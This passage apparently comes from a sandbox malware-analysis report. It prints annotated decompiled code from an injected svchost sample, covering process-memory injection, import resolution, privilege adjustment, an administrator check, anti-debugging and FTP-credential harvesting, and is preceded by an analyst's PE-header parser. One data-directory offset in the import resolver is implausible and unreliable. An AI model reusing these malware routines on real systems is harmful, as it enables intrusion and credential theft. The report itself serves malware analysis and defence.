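static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* DOS -> NT -> optional header, every read bounds-checked. 0 on success, negative on a bad header. */
int pe_parse_header(const uint8_t *buf, size_t len, struct pe_info *out)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;
    uint32_t e_lfanew = rd32(buf + 0x3c);                  /* E024434F0: _a8 + *(_a8 + 0x3c) */
    if (e_lfanew > len || len - e_lfanew < 4 + 20 + 28) return -2; /* sig + file hdr + PE32 standard fields */
    const uint8_t *nt = buf + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return -3;
    const uint8_t *fh  = nt + 4;
    const uint8_t *opt = nt + 0x18;
    size_t   avail    = len - e_lfanew - 0x18;             /* bytes left for the optional header */
    uint16_t opt_size = rd16(fh + 0x10);                   /* SizeOfOptionalHeader */
    out->machine = rd16(fh);
    out->magic   = rd16(opt);
    uint32_t dir_off;                                      /* offset of DataDirectory[] in the optional header */
    if (out->magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
        dir_off = 0x60;
        if (opt_size < dir_off || avail < dir_off) return -4;
        out->image_base = rd32(opt + 0x1c);                /* NT+0x34: _v16 in E024434F0 */
    } else if (out->magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
        dir_off = 0x70;
        if (opt_size < dir_off || avail < dir_off) return -4;
        out->image_base = rd64(opt + 0x18);
    } else return -5;
    out->size_of_image = rd32(opt + 0x38);                 /* NT+0x50: _v20 in E024434F0 */
    if (out->size_of_image == 0) return -6;
    uint32_t ndirs = rd32(opt + dir_off - 4);              /* NumberOfRvaAndSizes; relocations are index 5 */
    out->reloc_size = 0;
    if (ndirs > 5 && opt_size >= dir_off + 6 * 8 && avail >= dir_off + 6 * 8)
        out->reloc_size = rd32(opt + dir_off + 5 * 8 + 4);
    return 0;
}

/* E02443690's test: the low word of SYSTEM_INFO's leading union is wProcessorArchitecture. */
int host_is_amd64(uint32_t oem_id_union) { return (oem_id_union & 0xffff) == PROCESSOR_ARCHITECTURE_AMD64; }

/* Can the image run natively here? PE32 runs on x86 and (via WOW64) on x64; PE32+ needs an x64 host. */
int pe_matches_host(const struct pe_info *pi, int host_amd64)
{
    if (pi->magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) return pi->machine == IMAGE_FILE_MACHINE_I386;
    return host_amd64 && pi->machine == IMAGE_FILE_MACHINE_AMD64;
}

/* E024434F0 retries VirtualAllocEx with a NULL base when the preferred one is taken;
   an image that lands elsewhere is only usable if it carries base relocations. */
int pe_rebase_safe(const struct pe_info *pi, uint64_t actual_base)
{
    return actual_base == pi->image_base || pi->reloc_size != 0;
}

/* Minimal PE32 header constructed for this example (not a real binary). */
size_t build_sample_pe32(uint8_t *buf, size_t cap)
{
    const uint32_t nt = 0x80;
    if (cap < 0x200) return 0;
    memset(buf, 0, 0x200);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3c, nt);                                  /* e_lfanew */
    memcpy(buf + nt, "PE\0\0", 4);
    wr16(buf + nt + 4, IMAGE_FILE_MACHINE_I386);
    wr16(buf + nt + 4 + 0x10, 0xe0);                       /* SizeOfOptionalHeader */
    uint8_t *opt = buf + nt + 0x18;
    wr16(opt, IMAGE_NT_OPTIONAL_HDR32_MAGIC);
    wr32(opt + 0x1c, 0x00400000);                          /* ImageBase */
    wr32(opt + 0x38, 0x5000);                              /* SizeOfImage */
    wr32(opt + 0x5c, 16);                                  /* NumberOfRvaAndSizes */
    wr32(opt + 0x60 + 5 * 8, 0x4000);                      /* .reloc RVA */
    wr32(opt + 0x60 + 5 * 8 + 4, 0x40);                    /* .reloc size */
    return 0x200;
}

int main(void)
{
    uint8_t buf[0x200];
    struct pe_info pi;
    build_sample_pe32(buf, sizeof buf);
    if (pe_parse_header(buf, sizeof buf, &pi) != 0) { puts("malformed header"); return 1; }
    printf("machine=%#x base=%#llx size=%#x reloc=%#x\n", (unsigned)pi.machine,
           (unsigned long long)pi.image_base, pi.size_of_image, pi.reloc_size);
    printf("native on x64 host: %d, safe at 0x10000000: %d\n",
           pe_matches_host(&pi, host_is_amd64(PROCESSOR_ARCHITECTURE_AMD64)), pe_rebase_safe(&pi, 0x10000000ULL));
    return 0;
}
```

The two caveats the sample skips are the ones that matter when reusing this walk on a dumped payload: e_lfanew is attacker-controlled, so it is checked against the buffer length before the signature is read, and an image without a relocation directory is reported as unsafe to map anywhere but its ImageBase, which is exactly the case E024434F0's fallback allocation would silently break.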

                                                                                                                                        C-Code - Quality: 87%
			E10002941(CHAR* _a4, intOrPtr _a8) { // _a4: privilege name; _a8: non-zero enables it, zero disables it
				struct _LUID _v12;
				void* _v16;
				int _v20; // lies inside _v32: this is _v32.Privileges[0].Attributes
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				int _t28;
				void* _t30;

				// Three globals must be non-zero before anything is attempted; their meaning is not visible in this listing.
				if( *0x1000f4e8 == 0 ||  *0x1000f4ec == 0 ||  *0x1000f4d4 == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed; privilege name -> LUID
					if(_t19 != 0) {
						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) { // 0x20 == TOKEN_ADJUST_PRIVILEGES
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart; // decompiler residue: _v32.Privileges[0].Luid = _v12
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0; // Attributes = 0: disable
							} else {
								_v20 = 2; // Attributes = SE_PRIVILEGE_ENABLED
							}
						}
						// Runs even when OpenProcessToken failed (_v16 == 0); 0x10 == sizeof(TOKEN_PRIVILEGES).
						// A non-zero return does not prove the privilege was granted: AdjustTokenPrivileges also
						// returns non-zero with GetLastError() == ERROR_NOT_ALL_ASSIGNED when the token lacks it.
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30; // 1 on success, 0 otherwise
				}
			}












Instruction addresses for E10002941 (one per source line, in order): 0x1000294f, 0x10002967, 0x1000296a, 0x1000296a, 0x1000296c, 0x1000297c, 0x10002984, 0x1000299c, 0x1000299e, 0x100029a8, 0x100029ab, 0x100029ae, 0x100029b5, 0x100029c0, 0x100029b7, 0x100029b7, 0x100029b7, 0x100029b5, 0x100029d6, 0x100029de, 0x100029e0, 0x100029e0, 0x100029de, 0x100029e5, 0x100029ea, 0x100029ea, 0x100029f3, 0x100029f3

                                                                                                                                        APIs
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1000297C
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 10002986
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 10002994
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 100029D6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 100029EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3038321057-0
                                                                                                                                        • Opcode ID: d5d753e71fece0a3681d6b0666b468dde01dd85d6dc41ea8bff8f77c289c312e
                                                                                                                                        • Instruction ID: 58a22c2d32b5f492d318d977b920c660c9bd5fc2f262262849804c374510ad66
                                                                                                                                        • Opcode Fuzzy Hash: d5d753e71fece0a3681d6b0666b468dde01dd85d6dc41ea8bff8f77c289c312e
                                                                                                                                        • Instruction Fuzzy Hash: 20112E36900209EBFF51CF90CC8ABEEBBB9FB00385F104129E511A51D8D7B49A44DF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        C-Code - Quality: 88%
			E024434F0(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) { // _a4: target process handle; _a8: in-memory PE image
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				SIZE_T* _v28;
				SIZE_T* _v32;
				void* _t59;
				void* _t61;
				SIZE_T* _t63;
				int _t70;
				void* _t97;
				void* _t98;

				_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c)); // IMAGE_NT_HEADERS via e_lfanew; no bounds or signature check
				_v16 =  *((intOrPtr*)(_v24 + 0x34)); // OptionalHeader.ImageBase, the preferred base
				_v20 =  *((intOrPtr*)(_v24 + 0x50)); // OptionalHeader.SizeOfImage
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					// 0x3000 == MEM_COMMIT|MEM_RESERVE, 0x40 == PAGE_EXECUTE_READWRITE: try the preferred base first
					_t59 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40); // executed
					_v8 = _t59;
					if(_v8 == 0) {
						// Preferred base unavailable: allocate anywhere and carry the new base in _v16
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t61 = E02441390(_v20); // presumably a local buffer of SizeOfImage bytes (body not shown)
					_t98 = _t97 + 4; // stack-pointer bookkeeping left by the decompiler
					_v12 = _t61;
					if(_v12 != 0) {
						_v32 = 0;
						_t63 = E02443B40(_a8, _a12, _v12, _v16); // presumably builds the image into the local buffer for base _v16 (body not shown)
						_t97 = _t98 + 0x10;
                                                                                                                                        						_v32 = _t63;
                                                                                                                                        						if(_v32 != 1) {
                                                                                                                                        						} else {
                                                                                                                                        							if(_a16 != 0) {
                                                                                                                                        								 *_a16 = _v16;
                                                                                                                                        							}
                                                                                                                                        							if(_a20 != 0) {
                                                                                                                                        								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
                                                                                                                                        							}
                                                                                                                                        							_t70 = WriteProcessMemory(_a4, _v8, _v12, _v20, 0); // executed
                                                                                                                                        							if(_t70 != 0) {
                                                                                                                                        								_v28 = 1;
                                                                                                                                        								if(0 != 0) {
                                                                                                                                        									continue;
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        					}
                                                                                                                                        					L17:
                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                        						E024413D0(_v12); // executed
                                                                                                                                        					}
                                                                                                                                        					if(_v8 != 0 && _v28 == 0) {
                                                                                                                                        						VirtualFreeEx(_a4, _v8, _v20, 0x8000);
                                                                                                                                        					}
                                                                                                                                        					return _v28;
                                                                                                                                        				}
                                                                                                                                        				goto L17;
                                                                                                                                        			}
















Address column: 0x024434ff 0x02443508 0x02443511 0x02443514 0x0244351b 0x02443522 0x02443529 0x0244353c 0x02443542 0x02443549 0x02443562 0x02443568 0x02443568 0x0244356f 0x00000000 0x00000000 0x0244357a 0x0244357f 0x02443582 0x02443589 0x0244358d 0x024435a4 0x024435a9 0x024435ac 0x024435b3 0x024435b5 0x024435b9 0x024435c1 0x024435c1 0x024435c7 0x024435d5 0x024435d5 0x024435ed 0x024435f5 0x024435f9 0x02443602 0x00000000 0x00000000 0x00000000 0x024435f7 0x024435f5 0x00000000 0x0244358b 0x02443608 0x0244360c 0x02443612 0x02443617 0x0244361e 0x02443637 0x02443637 0x02443643 0x02443643 0x00000000

APIs
• VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 0244353C
• VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 0244355C
  • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
  • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
• WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 024435ED
• VirtualFreeEx.KERNEL32(00000000,00000000,FFFFFFFF,00008000), ref: 02443637
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
• String ID:
• API String ID: 2713107948-0
• Opcode ID: 644816cddf86c3c24d2723d4c4457c3a806dfe496c7a1d6e5cc8679579655723
• Instruction ID: 0ed4494db5bcc8dadd7641dc3df6f437ea43c8eadb7e5240301d3107e01eb5eb
• Opcode Fuzzy Hash: 644816cddf86c3c24d2723d4c4457c3a806dfe496c7a1d6e5cc8679579655723
• Instruction Fuzzy Hash: 5D411CB4E00209EFEF14CF94C455BAFBBB5BB48704F208599E509A7380DB74AA91CF91
Uniqueness

Uniqueness Score: 0.65%

C-Code - Quality: 100%
E02443800(intOrPtr _a4) {
	intOrPtr* _v8;
	struct HINSTANCE__* _v12;
	void* _v16;
	signed int* _v20;
	_Unknown_base(*)()* _v24;
	CHAR* _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	intOrPtr _v48;
	struct HINSTANCE__* _t83;

	_v32 = _a4;
	_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
	_v40 = _v36 + 0xbadc25;
	_v44 =  *_v40;
	_v8 = _a4 + _v44;
	while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
		_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
		_v12 = 0;
		_v12 = GetModuleHandleA(_v28);
		if(_v12 == 0) {
			_t83 = LoadLibraryA(_v28); // executed
			_v12 = _t83;
		}
		if(_v12 != 0) {
			_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
			_v20 = _a4 +  *_v8;
			if( *_v8 == 0) {
				_v20 = _v16;
			}
			while( *_v16 != 0) {
				_v48 = _a4 +  *_v20;
				_v24 = 0;
				if(( *_v20 & 0x80000000) == 0) {
					_v24 = GetProcAddress(_v12, _v48 + 2);
				} else {
					_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
				}
				if( *_v16 != _v24) {
					 *_v16 = _v24;
				}
				_v16 = _v16 + 4;
				_v20 =  &(_v20[1]);
			}
			_v8 = _v8 + 0x14;
			continue;
		} else {
			return 0;
		}
	}
	return 1;
}

Address column: 0x02443809 0x02443815 0x02443827 0x0244382f 0x02443838 0x0244383b 0x02443851 0x02443854 0x02443865 0x0244386c 0x02443872 0x02443878 0x02443878 0x0244387f 0x02443891 0x0244389c 0x024438a5 0x024438aa 0x024438aa 0x024438ad 0x024438bd 0x024438c0 0x024438d1 0x024438ff 0x024438d3 0x024438e9 0x024438e9 0x0244390a 0x02443912 0x02443912 0x0244391a 0x02443923 0x02443923 0x0244392e 0x00000000 0x02443881 0x00000000 0x02443881 0x0244387f 0x00000000

APIs
• GetModuleHandleA.KERNEL32(?), ref: 0244385F
• LoadLibraryA.KERNEL32(?), ref: 02443872
• GetProcAddress.KERNEL32(00000000,?), ref: 024438E3
• GetProcAddress.KERNEL32(00000000,?), ref: 024438F9
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID:
• API String ID: 384173800-0
• Opcode ID: 8ac27dd143158453a289da2823036f62566c8cd1746194961488099bf46a8ec0
• Instruction ID: 0673358f505dd496a6641f9f3f15f17680252cd0ba41672611ec87b8cd6e60b6
• Opcode Fuzzy Hash: 8ac27dd143158453a289da2823036f62566c8cd1746194961488099bf46a8ec0
• Instruction Fuzzy Hash: E7416374E00209EFDB04CF98C494BAEBBB1FF88304F248599D915AB355D735AA91CF94
Uniqueness Score: 0.86%

C-Code - Quality: 81%
			E1000B763(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t6;
				signed int _t7;
				signed int _t8;
				int _t11;
				void* _t19;
				void* _t20;
				signed int _t21;
				void* _t22;

				_t21 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_push(0); // executed
				L1000BA7C(); // executed; this is the OleInitialize(NULL) call listed under APIs below (ref 1000B765)
				_t6 = E10002BA3(E1000B04A(E100024EB(), __edx), _t21); // executed
				_t7 = E10002BDF(_t6, _t21); // executed
				_t8 = _t7;
				// Global flag at 0x1000f6dd; E1000B836 (below) tests it before deciding whether to call RevertToSelf
				if(_t7 != 0 && E10002CCA(_t8, _t21, *((intOrPtr*)(_t22 + 8))) != 0) {
					*0x1000f6dd = 1;
				}
				// 0x101 = UNLEN + 1, the buffer size GetUserNameA needs for the longest user name plus the terminator
				*0x100113a3 = E10001888(0x101);
				*(_t22 - 4) = 0x101;
				_t11 = GetUserNameA(*0x100113a3, _t22 - 4); // executed; collects the logged-on user name (ref 1000B7B8)
				if(_t11 == 0) {
					E10001871(*0x100113a3); // presumably the matching release routine; the pointer is cleared on failure
					*0x100113a3 = 0; // executed
				}
				E10002074(_t19, _t20, _t21); // executed
				// Hard-coded string from the image (xref 1000B7E0); what E1000B0B0 does with it is not shown in this report
				return E1000B0B0(E10001D56(), _t19, _t21, "1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes");
			}
APIs
• OleInitialize.OLE32(00000000), ref: 1000B765
• GetUserNameA.ADVAPI32(?,00000101), ref: 1000B7B8
Strings
• 1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes, xrefs: 1000B7E0
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: InitializeNameUser
• String ID: 1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes
• API String ID: 2272643758-938368175
• Opcode ID: eb252af98857a01cbb7a6dc21eff79e9b2048af3a9543baa725fcf224a65b952
• Instruction ID: 37508491f6f543c17347c83783eaad82340eacf14a8df0392226b3d6335b86e0
• Opcode Fuzzy Hash: eb252af98857a01cbb7a6dc21eff79e9b2048af3a9543baa725fcf224a65b952
• Instruction Fuzzy Hash: 6FF0D079A485155DF744EFB0DC4379D36A4EF117C4F404024F194954AEDFB5AA009762
Uniqueness Score: 1.28%

C-Code - Quality: 100%
			E1000B836(void* __ecx, void* __edx, void* __esi) {
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				int _t10;
				signed int _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;

				_t14 = __edx;
				_t13 = __ecx;
				// Installs the sample's own top-level exception filter at 0x1000B7EE, so an unhandled fault
				// is routed there instead of producing a crash dialog or WER report
				SetUnhandledExceptionFilter(0x1000b7ee); // executed
				*((intOrPtr*)(_t16 - 4)) = 0;
				_t6 = L1000B74A(_t16 - 4, _t13, _t14, _t16 - 4); // executed
				_t7 = E1000B04A(_t6, _t14); // executed
				_t8 = L1000AF14(_t7, _t14, __esi); // executed
				_t9 = E10002E6E(_t8, "samantha"); // executed; hard-coded string, see Strings below
				_t10 = L1000B347(_t9, _t13, _t14); // executed
				*((intOrPtr*)(_t16 - 8)) = 1;
				// 0x1000f6dd is the flag set in E1000B763 (above); when it is set and impersonation is
				// active (0x1000f4d0), the thread token is dropped with RevertToSelf
				if(*0x1000f6dd != 0) {
					if(*0x1000f4d0 != 0) {
						_t10 = RevertToSelf();
					}
					*0x1000f159 = 0x80000001; // executed; 0x80000001 is the predefined handle value HKEY_CURRENT_USER
				}
				_t11 = E1000B45B(_t10, _t14); // executed
				_t12 = E1000B56A(_t11, _t13, _t14); // executed
				return _t12;
			}
APIs
• SetUnhandledExceptionFilter.KERNEL32(1000B7EE), ref: 1000B83B
• RevertToSelf.ADVAPI32(samantha,?,1000B7EE), ref: 1000B882
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterRevertSelfUnhandled
• String ID: samantha
• API String ID: 669012916-1704246511
• Opcode ID: 6d61945b7c6008dfe2fee2fa83fe481585200e1ef6da47e66ec53b062998c621
• Instruction ID: cb94db7c0a16b474807957c3cfb269e8acc38f75f586b9f98ca4440c3c2c7b1d
• Opcode Fuzzy Hash: 6d61945b7c6008dfe2fee2fa83fe481585200e1ef6da47e66ec53b062998c621
• Instruction Fuzzy Hash: 3DE0E5B8900910EAFB00EFF0C88A7AC36A4EB803C9F504448E405525AECBB86684DB62
Uniqueness Score: 0.49%

C-Code - Quality: 58%
			E10002EF5() {
				struct _SID_IDENTIFIER_AUTHORITY _v12;
				void* _v16;
				long _v20;
				char* _t16;
				int _t20;
				void* _t22;

				// Three globals hold pointers resolved at run time (0x1000f4b0 is called through below).
				// If any of them is still NULL the function answers 1, i.e. it fails open rather than closed.
				if(*0x1000f4ac != 0 && *0x1000f4b0 != 0 && *0x1000f4b4 != 0) {
					// Identifier authority {0,0,0,0,0,5} is SECURITY_NT_AUTHORITY
					_t16 = &_v12;
					*_t16 = 0;
					*((char*)(_t16 + 1)) = 0;
					*((char*)(_t16 + 2)) = 0;
					*((char*)(_t16 + 3)) = 0;
					*((char*)(_t16 + 4)) = 0;
					*((char*)(_t16 + 5)) = 5;
					// Two sub-authorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS):
					// the SID built here is S-1-5-32-544, BUILTIN\Administrators
					_t20 = AllocateAndInitializeSid(&_v12, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, &_v16);
					if(_t20 != 0) {
						_v20 = 0;
						// The argument pattern (NULL token handle, SID, pointer to an out BOOL) is that of
						// CheckTokenMembership; the report only shows the indirect call, so the target is
						// inferred from the arguments, not named in the dump
						_t22 = *0x1000f4b0(0, _v16, &_v20); // executed
						if(_t22 == 0) {
							_v20 = 0; // call failed: report "not a member"
						}
						FreeSid(_v16);
						return _v20; // nonzero when the calling token is a member of BUILTIN\Administrators
					} else {
						return _t20;
					}
				} else {
					return 1;
				}
			}
Instruction addresses: 0x10002f02, 0x10002f1d, 0x10002f20, 0x10002f23, 0x10002f27, 0x10002f2b, 0x10002f2f, 0x10002f33, 0x10002f5a, 0x10002f5c, 0x10002f60, 0x10002f70, 0x10002f78, 0x10002f7a, 0x10002f84, 0x10002f8e, 0x10002f5f, 0x10002f16, 0x10002f1c

APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10002F54
• CheckTokenMembership.KERNELBASE(00000000,?,00000000), ref: 10002F70
• FreeSid.ADVAPI32(?), ref: 10002F84
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: d06ca1d5b5f393e54eaaad4472c41313ed9ce05ab2cab78da038516ff32234d1
• Instruction ID: 47580dc2e1dfe7aae5ed20c2832062f4081cd5a59123a896574bd8ee6e7bf946
• Opcode Fuzzy Hash: d06ca1d5b5f393e54eaaad4472c41313ed9ce05ab2cab78da038516ff32234d1
• Instruction Fuzzy Hash: 5711213190425ADEFB01CB94CC4DBAB7BF8EB00389F0581A8E511DA1E6D3B9D508DB52
Uniqueness
Uniqueness Score: 0.04%

C-Code - Quality: 100%
// Heap allocation wrapper: lazily caches the process heap handle in the global at 0x24473e0
E02441390(long _a4) {
	void* _t4;
	void* _t6;

	if(*0x24473e0 == 0) {
		*0x24473e0 = GetProcessHeap();
	}
	if(*0x24473e0 == 0) {
		return 0;
	} else {
		_t6 = *0x24473e0; // 0x2140000
		_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
		return _t4;
	}
}
Instruction addresses: 0x0244139a, 0x024413a2, 0x024413ae, 0x00000000, 0x024413b0, 0x024413b6, 0x024413bd, 0x00000000, 0x024413bd

APIs
• GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
• RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 7b699094e32a11495c5789e8dc195601e9ab926e0011257ac73d112acf9e59a4
• Instruction ID: f8282017a9b9020e748c4f6533df2d9d45b626e805dadc59aed74e89af3b5262
• Opcode Fuzzy Hash: 7b699094e32a11495c5789e8dc195601e9ab926e0011257ac73d112acf9e59a4
• Instruction Fuzzy Hash: 2AE0B6399C4204DBF7089BA0E49972677E8B30424DF100D16B90986A40DBB594B1CA50
Uniqueness
Uniqueness Score: 0.01%

C-Code - Quality: 52%
E10009F63(signed int __eax, void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
	char _v3;
	intOrPtr _v8;
	signed int _t9;
	intOrPtr _t13;
	void* _t16;
	signed int _t19;
	intOrPtr* _t22;
	char* _t26;
	void* _t28;
	intOrPtr _t29;

	_t29 = _t28 + 0xfffffffc;
	_t19 = __edx ^ __eax;
	_t9 = __eax ^ _t19;
	_t20 = _t19 ^ _t9;
	_push(0x10009f7d);
	asm("clc");
	if((_t19 ^ _t9) < 0) {
		_t16 = __ebx + 1;
		_t26 = &_v3;
		asm("cld");
		*_t9 = *_t9 + _t9;
		*_t9 = *_t9 + _t9;
		_t22 = 0x10010621;
		_push(_a4);
		_pop(*0x1001068d);
		_t10 = *[fs:0x30]; // fs:[0x30] is the PEB on 32-bit Windows
		if(*((char*)(*[fs:0x30] + 2)) != 0) { // PEB.BeingDebugged (offset 2) anti-debug check
			_t10 = E10001026(_t10, _t16, __ecx, _t20, _a4);
		}
		// walks a NULL-terminated table of function pointers at 0x10010621 and calls each
		while(*_t22 != 0) {
			E100023C5(_t10);
			*0x10010689 = E100014DB(_a4);
			_t13 = _t29;
			*[fs:0x0] = _t29; // installs an SEH frame around the indirect call
			_t10 = *_t22(_a4, _t13, E1000A012, 0x1000a059, _t13, _t26, *[fs:0x0], *[fs:0x0]); // executed
			if(*_t22 != E100044F3) {
				if(_t10 == 0x10) {
					_t10 = E1000130E(_t10, _t20, *0x1001068d, *0x10010689);
				} else {
					_v8 = 1;
				}
			}
			_t29 = _t29 + 0x18;
			_pop(*[fs:0x0]); // restores the previous SEH frame
			_t22 = _t22 + 4;
		}
		return _v8;
	} else {
		return _t9;
	}
}
Instruction addresses: 0x10009f66, 0x10009f6a, 0x10009f6c, 0x10009f6e, 0x10009f70, 0x10009f76, 0x10009f78, 0x10009f7c, 0x10009f7e, 0x10009f7f, 0x10009f80, 0x10009f82, 0x10009f84, 0x10009f89, 0x10009f8c, 0x10009f92, 0x10009f9c, 0x10009fa1, 0x1000a063, 0x10009fab, 0x10009fb8, 0x10009fc4, 0x10009fda, 0x10009fe4, 0x10009fec, 0x10009ff1, 0x1000a008, 0x10009ff3, 0x10009ff1, 0x1000a00d, 0x1000a059, 0x1000a060, 0x1000a071, 0x10009f7b

Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 573cb3fde4c656d6870b1c72682aebe408fd335189c86ce095e28a8bc962fb10
• Instruction ID: e61415d2f11a6843dca01fe5b56fe45d044cbab630dee6db419ff6f288f3c4aa
• Opcode Fuzzy Hash: 573cb3fde4c656d6870b1c72682aebe408fd335189c86ce095e28a8bc962fb10
• Instruction Fuzzy Hash: AB113272A04688EFFB22CF10CC00B987FB2EB467C0F058131F846951AAC77989A1DA51
Uniqueness
Uniqueness Score: 0.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100055DE(intOrPtr _a4, char* _a8) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				char _v2064;
                                                                                                                                        				intOrPtr _v2068;
                                                                                                                                        				long _t28;
                                                                                                                                        				long _t29;
                                                                                                                                        
                                                                                                                                         				E1000547E(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed  -- read one FTP-profile value layout under the key named by _a8 (helper body not shown here)
